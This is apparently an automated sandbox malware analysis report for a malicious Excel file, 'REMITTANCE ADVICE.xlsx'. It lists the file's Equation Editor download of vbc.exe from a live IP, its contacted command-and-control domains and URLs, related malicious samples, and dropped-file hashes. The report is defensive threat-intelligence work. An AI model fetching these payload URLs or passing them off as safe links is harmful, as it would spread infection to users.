          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.yhxt13800.com/m07f/?8pM=dna2QeGax28GSJkNz7Uka6j7mpWTPT6ewM6loPSgIzIWFgZfz42ON2JlykoAty+SKeMdPQ==&8p=5jRPexjhYVA0%Avira URL Cloudsafe
          https://www.clicktoreach.com/m07f/?8p=5jRPexjhYVA&8pM=igd9ZaB/0LuNZ3khfd1rv5ythTuTDfiv5fbgroetehOkX60%Avira URL Cloudsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe
          http://www.promtgloan.com/m07f/?8p=5jRPexjhYVA&8pM=fckM7dU8XdB/CBRKAli8IWZTeVSsZcSnfT9NsehECm7QI2Avboj8F2o4ZiYCfg8g2yKAcw==0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          ff4cu6twc.xyz
          23.225.139.107
          truetrue
            unknown
            www.yhxt13800.com
            154.205.233.189
            truetrue
              unknown
              promtgloan.com
              34.102.136.180
              truefalse
                unknown
                www.clicktoreach.com
                156.234.44.48
                truetrue
                  unknown
                  www.promtgloan.com
                  unknown
                  unknowntrue
                    unknown
                    www.ff4cu6twc.xyz
                    unknown
                    unknowntrue
                      unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://192.210.173.90/70007/vbc.exetrue
                      • Avira URL Cloud: malware
                      unknown
                      www.ff4cu6twc.xyz/m07f/true
                      • Avira URL Cloud: phishing
                      low
                      http://www.clicktoreach.com/m07f/?8p=5jRPexjhYVA&8pM=igd9ZaB/0LuNZ3khfd1rv5ythTuTDfiv5fbgroetehOkX6jie/kGfA2Y9msKDFCRQxq0nA==true
                      • Avira URL Cloud: safe
                      unknown
                      http://www.yhxt13800.com/m07f/?8pM=dna2QeGax28GSJkNz7Uka6j7mpWTPT6ewM6loPSgIzIWFgZfz42ON2JlykoAty+SKeMdPQ==&8p=5jRPexjhYVAtrue
                      • Avira URL Cloud: safe
                      unknown
                      http://www.promtgloan.com/m07f/?8p=5jRPexjhYVA&8pM=fckM7dU8XdB/CBRKAli8IWZTeVSsZcSnfT9NsehECm7QI2Avboj8F2o4ZiYCfg8g2yKAcw==false
                      • Avira URL Cloud: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.windows.com/pctv.explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmpfalse
                        high
                        http://investor.msn.comvbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmpfalse
                          high
                          http://www.msnbc.com/news/ticker.txtvbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmpfalse
                            high
                            http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.512027103.0000000004650000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.512027103.0000000004650000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000004.00000002.464908482.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.456767218.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.461220666.0000000000409000.00000008.00020000.sdmpfalse
                              high
                              http://windowsmedia.com/redir/services.asp?WMPFriendly=truevbc.exe, 00000004.00000002.466643244.0000000002E47000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.489358652.0000000002CC7000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              unknown
                              http://www.hotmail.com/oevbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmpfalse
                                high
                                http://treyresearch.netexplorer.exe, 00000006.00000000.512027103.0000000004650000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkvbc.exe, 00000004.00000002.466643244.0000000002E47000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.489358652.0000000002CC7000.00000002.00020000.sdmpfalse
                                  high
                                  http://java.sun.comexplorer.exe, 00000006.00000000.487883890.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.467436694.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.icra.org/vocabulary/.vbc.exe, 00000004.00000002.466643244.0000000002E47000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.489358652.0000000002CC7000.00000002.00020000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000004.00000002.465747026.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.480237988.0000000001BE0000.00000002.00020000.sdmpfalse
                                    high
                                    http://nsis.sf.net/NSIS_Errorvbc.exe, vbc.exe, 00000004.00000002.464908482.0000000000409000.00000004.00020000.sdmp, vbc.exe, 00000004.00000000.456767218.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000005.00000000.461220666.0000000000409000.00000008.00020000.sdmpfalse
                                      high
                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.510856156.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472698287.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493785914.0000000008417000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.483993743.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.486816221.00000000083D7000.00000004.00000001.sdmpfalse
                                        high
                                        http://investor.msn.com/vbc.exe, 00000004.00000002.466454862.0000000002C60000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.470431447.0000000002AE0000.00000002.00020000.sdmpfalse
                                          high
                                          http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.510856156.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.484145859.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472911483.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.472698287.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.493785914.0000000008417000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.483993743.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.486816221.00000000083D7000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.510967068.0000000004513000.00000004.00000001.sdmpfalse
                                            high
                                            http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.512027103.0000000004650000.00000002.00020000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            low
                                            http://www.%s.comPAvbc.exe, 00000004.00000002.465747026.00000000022C0000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.480237988.0000000001BE0000.00000002.00020000.sdmpfalse
                                            • URL Reputation: safe
                                            low
                                            http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.487883890.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.467436694.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmpfalse
                                              high
                                              https://support.mozilla.orgexplorer.exe, 00000006.00000000.487883890.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.467436694.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.480003695.0000000000255000.00000004.00000020.sdmpfalse
                                                high
                                                https://www.clicktoreach.com/m07f/?8p=5jRPexjhYVA&8pM=igd9ZaB/0LuNZ3khfd1rv5ythTuTDfiv5fbgroetehOkX6explorer.exe, 00000007.00000002.671238367.0000000002E22000.00000004.00020000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.490467352.0000000003E50000.00000002.00020000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                low

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                192.210.173.90
                                                unknownUnited States
                                                36352AS-COLOCROSSINGUStrue
                                                154.205.233.189
                                                www.yhxt13800.comSeychelles
                                                26484IKGUL-26484UStrue
                                                156.234.44.48
                                                www.clicktoreach.comSeychelles
                                                136800XIAOZHIYUN1-AS-APICIDCNETWORKUStrue
                                                23.225.139.107
                                                ff4cu6twc.xyzUnited States
                                                40065CNSERVERSUStrue
                                                34.102.136.180
                                                promtgloan.comUnited States
                                                15169GOOGLEUSfalse

                                                General Information

                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                Analysis ID:528736
                                                Start date:25.11.2021
                                                Start time:18:11:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 55s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:REMITTANCE ADVICE.xlsx
                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                Number of analysed new started processes analysed:12
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.expl.evad.winXLSX@9/24@4/5
                                                EGA Information:Failed
                                                HDC Information:
                                                • Successful, ratio: 35.9% (good quality ratio 34.3%)
                                                • Quality average: 73%
                                                • Quality standard deviation: 28.6%
                                                HCA Information:
                                                • Successful, ratio: 92%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Found application associated with file extension: .xlsx
                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                • Attach to Office via COM
                                                • Scroll down
                                                • Close Viewer
                                                Warnings:
                                                Show All
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                • TCP Packets have been reduced to 100
                                                • Not all processes where analyzed, report is missing behavior information

                                                Simulations

                                                Behavior and APIs

                                                TimeTypeDescription
                                                18:11:39API Interceptor63x Sleep call for process: EQNEDT32.EXE modified
                                                18:11:46API Interceptor75x Sleep call for process: vbc.exe modified
                                                18:12:15API Interceptor225x Sleep call for process: explorer.exe modified

                                                Joe Sandbox View / Context

                                                IPs

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                192.210.173.90REMITTANCE ADVICE.xlsxGet hashmaliciousBrowse
                                                • 192.210.173.90/9996/vbc.exe
                                                23.225.139.107Citation-HEQ211025001T-EXPP v4,pdf.exeGet hashmaliciousBrowse
                                                • www.ff4c2myy0.xyz/b62n/?0N645BeP=2z8/DFBh6WpSpFX6wB1064sDrPXSeSOfJoiQLvsLuWsNGL1vZNLvTgutkyJJNZ2OPBS2&vVSdF=CPGHuRZ
                                                nieuwe voorbeeldcatalogus.exeGet hashmaliciousBrowse
                                                • www.ff4cdhffx.xyz/wtcv/?fDKDRP=4hl0tBDHW6JPsXG0&nfB=FSi4Qdy434FsvWx/pZkyb0EEcskqbIDHoUhsco76HWNDqdZM/2zbMwwINEqH4o0RX6tYdNliSQ==
                                                ITRli68rgq.exeGet hashmaliciousBrowse
                                                • www.ff4ciib4q.xyz/bs8f/?of=9rSLDPtHxj9hfT&3fKPRDU=l/4T0KvG3Qbse26kA+T24bIAmCiYaIE9w6t3mmhaX7GL32gDljPc3Nx0v53cYcljly9R
                                                NUo71b3C4p.exeGet hashmaliciousBrowse
                                                • www.ff4cuno43.xyz/fqiq/?08CT3r=I63H3q6o+dl8AtpK+GpoKwAA/R2rUg5XwX/Qi823haVwXJBXcEYht0Yyg/fQMhe0Sr5t&fB8P=4hMPVF78e
                                                rundll32.exeGet hashmaliciousBrowse
                                                • www.ff4cuno43.xyz/fqiq/?G48P-=I63H3q6o+dl8AtpK+GpoKwAA/R2rUg5XwX/Qi823haVwXJBXcEYht0Yyg8z5PhiMbIM7MatDHw==&hR=2dsLLTLhqbjx
                                                fdnVx1v1hc.exeGet hashmaliciousBrowse
                                                • www.ff4cuno43.xyz/fqiq/?r8k4qP=I63H3q6o+dl8AtpK+GpoKwAA/R2rUg5XwX/Qi823haVwXJBXcEYht0Yyg8zAQQCPVeQ8MatEUA==&eFN=NfkTrPI0M
                                                Draft shipping docs CI+PL_pdf.exeGet hashmaliciousBrowse
                                                • www.ff4ciib4q.xyz/bs8f/?oZR0KfS=l/4T0KvG3Qbse26kA+T24bIAmCiYaIE9w6t3mmhaX7GL32gDljPc3Nx0v6XMX91b7XUW&4heD=t0DpAxUX0Zi
                                                file0_stage3.dllGet hashmaliciousBrowse
                                                • www.ff4c75x4e.xyz/n8rn/?p2M=CBFdZGnnfRINNaHscVQzF6AW/CZxn+KqjlWBM+9MoyK/4TfCk94Vamz7l1wogD2uBQw9&klfLI=1bpx2rFhipSD4d
                                                sLtLgOtoPA.exeGet hashmaliciousBrowse
                                                • www.ff4cuno43.xyz/fqiq/?Pbu=IbAhXpax&i48l=I63H3q6o+dl8AtpK+GpoKwAA/R2rUg5XwX/Qi823haVwXJBXcEYht0Yyg8/ADAOMMOQq
                                                Cs3PcPy48f.msiGet hashmaliciousBrowse
                                                • www.ff4ca2623.xyz/fs3g/?Nr=Ya9NpMQyWUJcX8KgUZas68LXNBlV9zz2Bv5wz28/jqX+xqkVWAhUyruGfYE1L5Gi4K/f&8p_h4N=o2Mtah
                                                SUPPLY_PRICE_ORDER_9978484DF.exeGet hashmaliciousBrowse
                                                • www.ff4c3dgsp.xyz/rgoe/?n0DhB=j0DpGx9XxT-Tnhk&0N9=sgGY6EHrU2/sPlFv65T/Wb7gB3GGagfeDoLJsp77UP3iiMN1AZE/7XMT6P9bXkgBT15arvy1nw==
                                                Payment_Breakdown_pdf.exeGet hashmaliciousBrowse
                                                • www.xlff08161z6b239.xyz/ons5/?3f-=dV1HNRUKQAWmuWwulpLGpeH60htmSo5o/mC4LpNZY1M8X1pV+bTt0ziROeFd8wC1X41C&YR-0=y48tk6C

                                                Domains

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                                ASN

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                IKGUL-26484USZr26f1rL6r.exeGet hashmaliciousBrowse
                                                • 164.155.212.139
                                                bWDUmvmiU2.exeGet hashmaliciousBrowse
                                                • 164.155.184.27
                                                oBQ6KSv5X5.exeGet hashmaliciousBrowse
                                                • 164.155.184.27
                                                Hpeiw33wDBGet hashmaliciousBrowse
                                                • 156.249.231.178
                                                AWB_SHIPPING DOCS.exeGet hashmaliciousBrowse
                                                • 164.155.212.139
                                                he7hRoAnnxGet hashmaliciousBrowse
                                                • 156.249.231.175
                                                UMzkP6ANWUGet hashmaliciousBrowse
                                                • 156.249.231.108
                                                i4AQJGJ40TGet hashmaliciousBrowse
                                                • 154.205.138.16
                                                guvcIjZ3syGet hashmaliciousBrowse
                                                • 156.238.135.198
                                                Llh4ns8qWzGet hashmaliciousBrowse
                                                • 156.249.231.150
                                                x86Get hashmaliciousBrowse
                                                • 156.249.231.173
                                                d8Hs7X8HGPGet hashmaliciousBrowse
                                                • 156.231.211.181
                                                x86Get hashmaliciousBrowse
                                                • 156.231.181.95
                                                Heri2RE17IGet hashmaliciousBrowse
                                                • 156.249.231.116
                                                mktkJhN1FdGet hashmaliciousBrowse
                                                • 156.249.231.186
                                                SQFoFeC1jQGet hashmaliciousBrowse
                                                • 156.238.135.174
                                                pZvr71PT9vGet hashmaliciousBrowse
                                                • 156.251.66.56
                                                WcBBoVjwRfGet hashmaliciousBrowse
                                                • 156.249.231.160
                                                NUo71b3C4p.exeGet hashmaliciousBrowse
                                                • 164.155.184.27
                                                SouaKX7fQjGet hashmaliciousBrowse
                                                • 156.247.139.123
                                                AS-COLOCROSSINGUS3nkW4MtwSD.rtfGet hashmaliciousBrowse
                                                • 198.46.199.153
                                                Employee payment plan.HTMGet hashmaliciousBrowse
                                                • 23.95.214.111
                                                ATT67586.HTMGet hashmaliciousBrowse
                                                • 172.245.112.92
                                                xF3wienie.xlsxGet hashmaliciousBrowse
                                                • 198.23.207.111
                                                Quote Request - Linde Tunisia.xlsxGet hashmaliciousBrowse
                                                • 107.173.191.111
                                                PO PENANG ORDER C0023.xlsxGet hashmaliciousBrowse
                                                • 198.12.107.117
                                                BANK-SWIFT.xlsxGet hashmaliciousBrowse
                                                • 107.173.229.133
                                                1HT42224.xlsxGet hashmaliciousBrowse
                                                • 198.23.207.36
                                                new order.xlsxGet hashmaliciousBrowse
                                                • 198.23.251.13
                                                Shipping Schedule.xlsxGet hashmaliciousBrowse
                                                • 198.12.91.205
                                                Product_Specification_Sheet.xlsxGet hashmaliciousBrowse
                                                • 107.173.219.26
                                                lod2.xlsxGet hashmaliciousBrowse
                                                • 198.23.207.36
                                                Payment Slip.xlsxGet hashmaliciousBrowse
                                                • 198.46.136.245
                                                20002.xlsxGet hashmaliciousBrowse
                                                • 198.46.136.245
                                                lSBl5Mhq80.rtfGet hashmaliciousBrowse
                                                • 198.46.199.153
                                                STATEMENT OF ACCOUNT.xlsxGet hashmaliciousBrowse
                                                • 192.227.228.37
                                                new order.docxGet hashmaliciousBrowse
                                                • 198.46.199.153
                                                Amended Order.xlsxGet hashmaliciousBrowse
                                                • 192.3.121.173
                                                Payment Swift.xlsxGet hashmaliciousBrowse
                                                • 198.12.107.104
                                                SOA.xlsxGet hashmaliciousBrowse
                                                • 107.172.13.149

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                C:\Users\user\AppData\Local\Temp\nsvE542.tmp\otav.dllvbc.exeGet hashmaliciousBrowse

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                  Category:downloaded
                                                  Size (bytes):305085
                                                  Entropy (8bit):7.93321683103638
                                                  Encrypted:false
                                                  SSDEEP:6144:rGiIouWvjqebPleWFVGwN5QwB0ZmAFd+DnMAlym7a:fzuebPlDVGwNh3AFPb
                                                  MD5:1624595E2354FF7BE9E7DC6DEF2ED69E
                                                  SHA1:1DCFAAE594E3690D3FEF5FD4DE855D02E9CBB2A5
                                                  SHA-256:4B50745E74FEA6FAA516B4D46B7C9FBE36FDAE2301B76EC940635D033707A2C8
                                                  SHA-512:AEBD6E6D28ECAB56E48B037836C2FFC573A8493B576EA3B59AC6932C6E782FC99AD1DA7A67A231830A2C4612C89E24F0E7F483D24080F29D6133D81C7207971E
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Metadefender, Detection: 9%, Browse
                                                  • Antivirus: ReversingLabs, Detection: 27%
                                                  Reputation:low
                                                  IE Cache URL:http://192.210.173.90/70007/vbc.exe
                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.......p....@..........................................................................t.......p...............................................................................p...............................text...h[.......\.................. ..`.rdata.......p.......`..............@..@.data...X\...........t..............@....ndata...................................rsrc........p.......x..............@..@........................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\16F16FDC.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 130 x 176, 8-bit/color RGB, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):19408
                                                  Entropy (8bit):7.931403681362504
                                                  Encrypted:false
                                                  SSDEEP:384:6L3Vdo4yxL8FNgQ9jYtUO5Zn4tIlQ1Yes7D6PhbXngFfZdQTEfn4n6EVPBo6a:2exL8rgQ2tVF4GlQUuZXnYfTs6EJiL
                                                  MD5:63ED10C9DF764CF12C64E6A9A2353D7D
                                                  SHA1:608BE0D9462016EA4F05509704CE85F3DDC50E63
                                                  SHA-256:4DAC3676FAA787C28DFA72B80FE542BF7BE86AAD31243F63E78386BC5F0746B3
                                                  SHA-512:9C633C57445D67504E5C6FE4EA0CD84FFCFECFF19698590CA1C4467944CD69B7E7040551A0328F33175A1C698763A47757FD625DA7EF01A98CF6C585D439B4A7
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: .PNG........IHDR.............L.!... .IDATx..g.].y&X'...{;.t@F. .. .D*Q.eI..#[.5~lK3...z.3.gw...^.=;.FV..%..d..%R..E......F.ts<..X..f..F..5|..s..:Uu.W.U....!.9...A..u/...g.w......lx...pG..2..x..w..!...w.pG..2..x..w..!.....m.a>.....R........x.IU[.A.....].Y.L..!....|AQ.h4....x..\6....|.i..]..Q..(...C..A..Z... (j.f4..u=..o.D.oj....y6......)I.......G.{zn.M,...?#..,...|....y....G.LOO..?.....7..-.>.._.m[.........q.O}..G....?....h4.=t..c...eY.........3g..|0...x...|..../F....o.._|...?.O..........c..x._..7vF..0.....B>.....}{..V....P(.....c.....4...s...K.K."c(.....}.0......._z...}..y<<.......<..^.7....k.r.W~..c._.....$J....:.w._~.........._..Wp.....q........G..vA.D.E......"...?...'....}nvv....^.^.42..f....Q(..$...`(vidd..8......y.Z{...L.~...k....z....@@0...Bk..?.r..7...9u...w.>w.C..j.n..a..V.?..?...es#.G...l.&I..)..).J..>...+Mn.^.W.._....D...".}..k......8.N_.v..>.y.@0..,/.........>.a...........z.].../.r .........../3.....?.z..g.Z.....l0.L.S....._../.r
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B2337C9.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 1295 x 471, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):68702
                                                  Entropy (8bit):7.960564589117156
                                                  Encrypted:false
                                                  SSDEEP:1536:Hu2p9Cy+445sz12HnOFIr0Z7gK8mhVgSKe/6mLsw:O2p9w1HCIOTKEhQw
                                                  MD5:9B8C6AB5CD2CC1A2622CC4BB10D745C0
                                                  SHA1:E3C68E3F16AE0A3544720238440EDCE12DFC900E
                                                  SHA-256:AA5A55A415946466C1D1468A6349169D03A0C157A228B4A6C1C85BFD95506FE0
                                                  SHA-512:407F29E5F0C2F993051E4B0C81BF76899C2708A97B6DF4E84246D6A2034B6AFE40B696853742B7E38B7BBE7815FCCCC396A3764EE8B1E6CFB2F2EF399E8FC715
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: .PNG........IHDR.....................pHYs..........+......tIME......&...T....tEXtAuthor....H....tEXtDescription...!#....tEXtCopyright....:....tEXtCreation time.5.......tEXtSoftware.]p.:....tEXtDisclaimer.........tEXtWarning........tEXtSource.........tEXtComment........tEXtTitle....'.. .IDATx...y|T.?..l..3. .$.D..(v....Q.q.....W.[...Z..-.*Hlmm...4V..BU..V@,h.t.....}...cr.3.......B3s.....|.}.G6j.t.Qv..-Q9...r\"""""""".H9...Y..*.v...........7........Q..^t{P..C..""""""""".e..n@7B.{Q.S.HDDDDDDDD...........\bxHDDDDDDDDD.1<$""""""""......d2Y@9`@c.v..8P...0`..a|.....<... ..+...[""""""""".....~..,........+.t..._..o.....8z.$ ..U.Mp".....Z8.a;.B..'...y..I^......e........,}.+.M..K...M...A.7.Z[[.E.....B...nF.:5.."""""""".(.....d.3*..E.=...[o...o.....n..._.{..-..M.3....px(.5..4lt..&....d.R!.......!.$''.n.....X,..__ar.d..0 .M#"""""""..S...T...Ai.8P^XX(..d.....u[.f...8........[`...q..9R../.....v.b.5.r`.[.A..a.....a6......S.o.h7...........g..v..+.~.oB.H..|..8...
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\25CF4E4A.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 338 x 143, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):6364
                                                  Entropy (8bit):7.935202367366306
                                                  Encrypted:false
                                                  SSDEEP:192:joXTTTt+cmcZjbF/z2sA9edfxFHTeDELxExDR:joXTTTEc5ZjR/zI9EfjTeDEGxDR
                                                  MD5:A7E2241249BDCC0CE1FAAF9F4D5C32AF
                                                  SHA1:3125EA93A379A846B0D414B42975AADB72290EB4
                                                  SHA-256:EC022F14C178543347B5F2A31A0BFB8393C6F73C44F0C8B8D19042837D370794
                                                  SHA-512:A5A49B2379DF51DF5164315029A74EE41A2D06377AA77D24A24D6ADAFD3721D1B24E5BCCAC72277BF273950905FD27322DBB42FEDA401CA41DD522D0AA30413C
                                                  Malicious:false
                                                  Preview: .PNG........IHDR...R...........S.....sRGB.........gAMA......a.....pHYs..........o.d...!tEXtCreation Time.2018:08:27 10:23:35Z......DIDATx^....M......3c0f0.2.9o.......-..r..:.V*.ty..MEJ.^.$G.T.AJ.J.n.....0.`...B...g=....{..5.1...|.g.z..Y.._...3k..y............@JD...)..KQ.........f.DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.1.....@JD...)..K..DD.....9.sdKv.\.R[...k...E..3....ee.!..Wl...E&6.\.]..'K...x.O..%.EE..'...}..[c....?n..R...V..U5!.Rt...-xw*.....#..._....I....k.!":...H.....eKN.....9....{%......*7..6Y..".....P....."ybQ.....JJ`z..%..a.$<m.n'..[.f0~..r.........-.q...{.Mu3.yX...\...5.a.zNX.9..-.[......QU.r .qZ...&.{....$..`.Lu..]Z^'.].k|.z.3....H.../...k7.1>y.D..._x...........=.u.?ee.9.'.11:={.t]....)..k...F@P|f....9...K>...{...}...h9.b..h....w.....A~...u..j.9..x..C=.JJ.h....K2.... .../I..=3C.6k.]...JD.....:tP.e...-+*...}..\.Yrss4...i.f..A7I...u.M....v.uY_.V|.].-Oo..........._.;@c....`.....|.R7>^...j*S...{...w.iV..UR..SJ.hy.W3...2Q@f......,.....
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\29F275C3.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):10202
                                                  Entropy (8bit):7.870143202588524
                                                  Encrypted:false
                                                  SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                  MD5:66EF10508ED9AE9871D59F267FBE15AA
                                                  SHA1:E40FDB09F7FDA69BD95249A76D06371A851F44A6
                                                  SHA-256:461BABBDFFDCC6F4CD3E3C2C97B50DDAC4800B90DDBA35F1E00E16C149A006FD
                                                  SHA-512:678656042ECF52DAE4132E3708A6916A3D040184C162DF74B78C8832133BCD3B084A7D03AC43179D71AD9513AD27F42DC788BCBEE2ACF6FF5E7FEB5C3648B305
                                                  Malicious:false
                                                  Preview: .PNG........IHDR...............|.....sRGB.........gAMA......a.....pHYs..........o.d..'oIDATx^.k...u.D.R.b\J"Y.*.".d.|pq..2.r,.U.#.)F.K.n.).JI)."....T.....!.....`/H. ...\<...K...DQ"..]..(RI..>.s..t..w.>..U....>.....s/....1./^..p..........Z.H3.y..:..<..........[...@[.........Z.`E....Y:{.,.<y..x....O..................M....M........:..tx..*..........'o..kh.0./.3.7.V...@t........x......~...A.?w....@...A]h.0./.N..^,h......D.....M..B..a}a.a.i.m...D.....M..B..a}a.a.........A]h.0.....P41..-........&.!...!.x......(.......e..a :.+.|.Ut.U_..........2un......F7[.z.?...&..qF}.}..]I...+..J.w.~Aw....V..-.....B, W.5..P.y....>[.....q.t.6U<..@.....qE9.nT.u...`..AY.?...Z<.D.t...HT..A.....8.)..M...k\...v...`..A..?.N.Z<.D.t.Htn.O.sO...0..wF...W.#H...!p....h...|.V+Kws2/......W*....Q.,...8X.)c...M..H.|.h.0....R...Mg!...B...x..;....Q..5........m.;.Q./9..e"{Y.P..1x...FB!....C.G.......41.........@t@W......B/.n.b...w..d....k'E..&..%l.4SBt.E?..m...eb*?.....@.....a :.+H...Rh..
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34C7D190.png
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:PNG image data, 413 x 220, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):10202
                                                  Entropy (8bit):7.870143202588524
                                                  Encrypted:false
                                                  SSDEEP:192:hxKBFo46X6nPHvGePo6ylZ+c5xlYYY5spgpb75DBcld7jcnM5b:b740IylZ+c5xlYF5Sgd7tBednd
                                                  MD5:66EF10508ED9AE9871D59F267FBE15AA
